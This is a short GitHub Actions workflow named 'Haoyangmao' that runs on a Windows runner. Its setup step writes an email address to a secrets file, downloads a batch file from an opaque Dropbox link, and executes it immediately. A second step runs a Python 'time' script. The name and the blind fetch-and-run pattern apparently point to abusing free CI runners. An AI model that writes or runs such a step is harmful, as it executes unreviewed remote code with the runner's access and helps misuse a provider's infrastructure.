name: Haoyangmao

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=jwj-@outlook.com" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/c76mo8awyq2ell3lrb9fz/down.bat?rlkey=fas2alvfy39opg0wa8es4g1r2&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: python time.py
